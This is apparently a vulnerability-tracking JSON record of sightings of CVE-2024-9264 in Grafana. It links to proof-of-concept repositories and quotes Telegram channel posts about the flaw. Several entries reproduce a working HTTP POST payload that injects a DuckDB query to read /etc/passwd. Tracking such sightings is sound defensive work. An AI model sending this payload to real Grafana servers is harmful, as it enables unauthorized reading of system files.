{"vulnerability": "CVE-2024-9264", "sightings": [{"uuid": "12a06d38-0191-4d6c-859f-af3e498007f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "8ef3179e-6ae2-42ba-9d27-75d713d75f20", "vulnerability": "CVE-2024-9264", "type": "seen", "source": null, "content": "", "creation_timestamp": "2024-10-18T12:29:00.856730Z"}, {"uuid": "e33e334d-12a1-4305-a7a3-42a7f55d2f6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-9264", "type": "seen", "source": "https://bsky.app/profile/Ubuntu.activitypub.awakari.com.ap.brid.gy/post/3m4fm4zrubr62", "content": "", "creation_timestamp": "2025-10-30T09:05:29.394445Z"}, {"uuid": "1af441db-1f02-4b53-ad33-d10d7fd889f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "exploited", "source": "https://gist.github.com/henriquetorquato/cf57586d8a8f85aede76b99d62f8896d", "content": "", "creation_timestamp": "2025-05-19T15:29:36.000000Z"}, {"uuid": "4f41ab48-bb13-4aaa-bb8d-0fc01ade444a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-9264", "type": "exploited", "source": "https://github.com/nollium/CVE-2024-9264", "content": "", "creation_timestamp": "2024-10-17T15:49:14.000000Z"}, {"uuid": "cd394f62-56cc-43f8-bdb2-dbeef9c4a6a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "seen", "source": "https://bsky.app/profile/cyberalerts.bsky.social/post/3lkdjnlxjb42o", "content": "", "creation_timestamp": "2025-03-14T11:40:19.275344Z"}, {"uuid": "1f27fe08-3fbf-4813-b431-d3df861cfc9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/43130", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aGrafana RCE\nURL\uff1ahttps://github.com/ruizii/CVE-2024-9264\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-07-05T23:53:19.000000Z"}, {"uuid": "68714e88-7b74-4c1a-adce-115d850c6c2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "seen", "source": "https://gist.github.com/Darkcrai86/7b42898149ad19a2dd937e6d5315cc08", "content": "", "creation_timestamp": "2025-09-16T09:58:12.000000Z"}, {"uuid": "ba936212-44e2-491e-b73f-162788f45368", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/orderofsixangles/2483", "content": "Pitfalls of COM object activation\n\nHow to Use Windows Volume Shadow Copies in Digital Forensics\n\nShellcode: Obfuscation with Permutations\n\nRelay Attack on WinReg RPC Client\n\nbedevil: Dynamic Linker Patching\n\nExploit for Grafana arbitrary file-read (CVE-2024-9264)\n\nchill kernel hacking for fun (week 38, debug stack crash)", "creation_timestamp": "2024-10-21T11:06:33.000000Z"}, {"uuid": "2f8d8791-4c56-4784-8620-5807feca133a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "Telegram/17sx7vfyYyw5cNVTNyrGtWFmcDoHLeuKbaDi91L36vhy8Ec", "content": "", "creation_timestamp": "2025-07-07T21:00:04.000000Z"}, {"uuid": "599c9557-6241-4528-9b6c-4fa95b74738a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8788", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aExploit for Grafana arbitrary file-read (CVE-2024-9264)\nURL\uff1ahttps://github.com/zgimszhd61/CVE-2024-9264\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-10-20T05:25:32.000000Z"}, {"uuid": "dc6b5fba-908f-4d12-bde5-c60054ab18d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8781", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aExploit for Grafana arbitrary file-read (CVE-2024-9264)\nURL\uff1ahttps://github.com/nollium/CVE-2024-9264\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-10-21T02:05:02.000000Z"}, {"uuid": "555712eb-3aa8-4ae7-8c48-14cd02379cdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8785", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aFile Read Proof of Concept for CVE-2024-9264\nURL\uff1ahttps://github.com/z3k0sec/File-Read-CVE-2024-9264\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-10-20T01:17:27.000000Z"}, {"uuid": "c35f943d-c77e-4530-a34b-f9b1b0ae4256", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8784", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aGrafana PoC (CVE-2024-9264)\nURL\uff1ahttps://github.com/z3k0sec/File-Read-File-Read-CVE-2024-9264\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-10-20T01:13:17.000000Z"}, {"uuid": "0211d6e9-2429-49c3-92b4-0bf3be97ea9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8806", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aGrafana RCE exploit (CVE-2024-9264)\nURL\uff1ahttps://github.com/z3k0sec/CVE-2024-9264-RCE-Exploit\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-10-21T22:20:48.000000Z"}, {"uuid": "287a6492-8d05-4ca6-aac1-a1dbf48b8eae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/43298", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aAuthenticated RCE in Grafana (v11.0) via SQL Expressions - PoC Exploit\nURL\uff1ahttps://github.com/rvizx/CVE-2024-9264\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-07-07T16:03:39.000000Z"}, {"uuid": "2778e237-c3ec-46c1-805a-4a2142982ff1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/tech_b0lt_Genona/4743", "content": "9.4 CRITICAL\n\nThe SQL Expressions experimental feature of Grafana allows for the evaluation of `duckdb` queries containing user input. These queries are insufficiently sanitized before being passed to `duckdb`, leading to a command injection and local file inclusion vulnerability. Any user with the VIEWER or higher permission is capable of executing this attack. The `duckdb` binary must be present in Grafana's $PATH for this attack to function; by default, this binary is not installed in Grafana distributions.\nhttps://nvd.nist.gov/vuln/detail/CVE-2024-9264\n\nPoC\n\nThis PoC demonstrates the exploitation of CVE-2024-9264 using an authenticated user to perform a DuckDB SQL query and read an arbitrary file on the filesystem.\n\nhttps://github.com/nollium/CVE-2024-9264\n\n\u0421\u043f\u0430\u0441\u0438\u0431\u043e \u043f\u043e\u0434\u043f\u0438\u0441\u0447\u0438\u043a\u0443 \u0437\u0430 \u0441\u0441\u044b\u043b\u043a\u0443", "creation_timestamp": "2024-10-20T21:26:03.000000Z"}, {"uuid": "edb43467-cfb4-4267-8591-f480b51db132", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "Telegram/rldrVU4EbTTnPd8U3W40-F0FQeroqHkK7JRuQCr9iPTQCg8", "content": "", "creation_timestamp": "2025-07-06T03:00:04.000000Z"}, {"uuid": "ce17d42b-70b3-4676-8ef3-61c9667e38d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "Telegram/OfnIDPmAFs0rAOlHw_eXR0j7Vkoel5eBSFNWkjtXQVWONMM", "content": "", "creation_timestamp": "2025-07-21T15:00:06.000000Z"}, {"uuid": "3e118e0b-246a-4a71-bddf-3226f97f615b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/19780", "content": "https://github.com/nollium/CVE-2024-9264\n\nExploit for Grafana arbitrary file-read (CVE-2024-9264)\n#github #exploit", "creation_timestamp": "2024-10-19T16:48:20.000000Z"}, {"uuid": "6aa4b2d4-5f9c-4bdd-899b-4e2b7d7e9cf4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/575", "content": "https://github.com/nollium/CVE-2024-9264\n\nExploit for Grafana arbitrary file-read (CVE-2024-9264)\n#github #exploit", "creation_timestamp": "2024-10-19T19:13:42.000000Z"}, {"uuid": "8181070e-70b4-492d-ac04-6ca92335aa21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "seen", "source": "https://t.me/cvedetector/8272", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-9264 - Grafana SQL Expressions Command Injection and Local File Inclusion Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-9264 \nPublished : Oct. 18, 2024, 4:15 a.m. | 31\u00a0minutes ago \nDescription : The SQL Expressions experimental feature of Grafana allows for the evaluation of `duckdb` queries containing user input. These queries are insufficiently sanitized before being passed to `duckdb`, leading to a command injection and local file inclusion vulnerability. Any user with the VIEWER or higher permission is capable of executing this attack.  The `duckdb` binary must be present in Grafana's $PATH for this attack to function; by default, this binary is not installed in Grafana distributions. \nSeverity: 9.9 | CRITICAL \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"18 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-18T06:52:30.000000Z"}, {"uuid": "d23cfb86-ca6d-4e2b-b8f0-ac2b43bd1994", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/2326", "content": "https://github.com/nollium/CVE-2024-9264\n\nExploit for Grafana arbitrary file-read (CVE-2024-9264)\n#github #exploit", "creation_timestamp": "2024-10-19T16:48:20.000000Z"}, {"uuid": "7d5a92bc-4f98-42ed-9d58-80f6e0924270", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/1786", "content": "\ud83d\udc7eCVE-2024-9264  Grafana\n\n\ud83d\udd17exploit", "creation_timestamp": "2024-10-20T17:45:56.000000Z"}, {"uuid": "3f7eeb16-3ff7-4177-b452-ac160cdb5704", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "Telegram/5igKRsajI7IthQ32LqkCkoxcoI78FuKjBuHzgtzXnBbqfw", "content": "", "creation_timestamp": "2024-10-22T06:16:48.000000Z"}, {"uuid": "602a767a-437b-4f44-bd6c-b8cbf2d10456", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "seen", "source": "https://t.me/proxy_bar/2319", "content": "CVE-2024-9264  Grafana\n*\nexploit", "creation_timestamp": "2024-10-20T17:44:25.000000Z"}, {"uuid": "a7fbf6d9-9288-4ede-a205-33897447a559", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/haj3imad/20488", "content": "CVE-2024-9264\n\nPOST /api/ds/query?ds_type=expr&expression=true&requestId=Q100 HTTP/1.1\nHost: 127.0.0.1\nContent-Type: application/json\nCookie: grafana_session=a739fa9aeb235f2790f17de00fefe528\nContent-Length: 368\n\n{\n  \"from\": \"1696154400000\",\n  \"to\": \"1696345200000\",\n  \"queries\": [\n    {\n      \"datasource\": {\n        \"name\": \"Expression\",\n        \"type\": \"expr\",\n        \"uid\": \"expr\"\n      },\n      \"expression\": \"SELECT * FROM read_csv_auto('/etc/passwd');\",\n      \"hide\": false,\n      \"refId\": \"B\",\n      \"type\": \"sql\",\n      \"window\": \"\"\n    }\n  ]\n}\n\n/etc/passwd\n\n#exploit #poc", "creation_timestamp": "2024-11-06T11:03:20.000000Z"}, {"uuid": "59658214-a71a-43c7-9649-4fcaca2f1868", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3340", "content": "https://github.com/nollium/CVE-2024-9264\n\nExploit for Grafana arbitrary file-read (CVE-2024-9264)\n#github #exploit", "creation_timestamp": "2024-10-19T16:44:06.000000Z"}, {"uuid": "20fe6721-4655-4dc9-8868-b14a81a77af0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3419", "content": "CVE-2024-9264\n\nPOST /api/ds/query?ds_type=expr&expression=true&requestId=Q100 HTTP/1.1\nHost: 127.0.0.1\nContent-Type: application/json\nCookie: grafana_session=a739fa9aeb235f2790f17de00fefe528\nContent-Length: 368\n\n{\n  \"from\": \"1696154400000\",\n  \"to\": \"1696345200000\",\n  \"queries\": [\n    {\n      \"datasource\": {\n        \"name\": \"Expression\",\n        \"type\": \"expr\",\n        \"uid\": \"expr\"\n      },\n      \"expression\": \"SELECT * FROM read_csv_auto('/etc/passwd');\",\n      \"hide\": false,\n      \"refId\": \"B\",\n      \"type\": \"sql\",\n      \"window\": \"\"\n    }\n  ]\n}\n\n/etc/passwd\n\n#exploit #poc", "creation_timestamp": "2024-11-06T11:01:32.000000Z"}, {"uuid": "f42e30db-0bf8-4820-bcea-2811afe66c3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/S_E_Reborn/5184", "content": "Pitfalls of COM object activation\n\nHow to Use Windows Volume Shadow Copies in Digital Forensics\n\nShellcode: Obfuscation with Permutations\n\nRelay Attack on WinReg RPC Client\n\nbedevil: Dynamic Linker Patching\n\nExploit for Grafana arbitrary file-read (CVE-2024-9264)\n\nchill kernel hacking for fun (week 38, debug stack crash)", "creation_timestamp": "2024-10-21T18:10:52.000000Z"}, {"uuid": "28f40592-eee7-4e3f-8115-cb2e13ee5136", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11305", "content": "#exploit\n1. CVE-2024-44133:\nPrivacy Controls Bypasses in Safari (+ \"HM-Surf\" evaluator)\nhttps://github.com/yo-yo-yo-jbo/hm-surf\n\n2. CVE-2024-9264:\nGrafana Post-Auth DuckDB SQLI (File Read)\nhttps://github.com/nollium/CVE-2024-9264\n\n3. CVE-2024-27983:\nHTTP2 Node.js server DoS\nhttps://github.com/lirantal/CVE-2024-27983-nodejs-http2", "creation_timestamp": "2024-10-25T19:30:02.000000Z"}, {"uuid": "1c19059e-a2e5-4994-9576-471e16c362e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "published-proof-of-concept", "source": "https://t.me/god_of_server/7", "content": "#exploit\n1. CVE-2024-44133:\nPrivacy Controls Bypasses in Safari (+ \"HM-Surf\" evaluator)\nhttps://github.com/yo-yo-yo-jbo/hm-surf\n\n2. CVE-2024-9264:\nGrafana Post-Auth DuckDB SQLI (File Read)\nhttps://github.com/nollium/CVE-2024-9264\n\n3. CVE-2024-27983:\nHTTP2 Node.js server DoS\nhttps://github.com/lirantal/CVE-2024-27983-nodejs-http2\n\n\n\ud83d\udd23\ud83d\udd23", "creation_timestamp": "2024-10-26T13:55:32.000000Z"}, {"uuid": "ed5497f4-bc64-4b06-bb5e-4493b203c857", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "exploited", "source": "https://t.me/ckeArsenal/18", "content": "CVE-2024-9264\n\nPOST /api/ds/query?ds_type=expr&expression=true&requestId=Q100 HTTP/1.1\nHost: 127.0.0.1\nContent-Type: application/json\nCookie: grafana_session=a739fa9aeb235f2790f17de00fefe528\nContent-Length: 368\n\n{\n  \"from\": \"1696154400000\",\n  \"to\": \"1696345200000\",\n  \"queries\": [\n    {\n      \"datasource\": {\n        \"name\": \"Expression\",\n        \"type\": \"expr\",\n        \"uid\": \"expr\"\n      },\n      \"expression\": \"SELECT * FROM read_csv_auto('/etc/passwd');\",\n      \"hide\": false,\n      \"refId\": \"B\",\n      \"type\": \"sql\",\n      \"window\": \"\"\n    }\n  ]\n}\n\n/etc/passwd\n\n#exploit #poc", "creation_timestamp": "2024-11-18T09:06:32.000000Z"}]}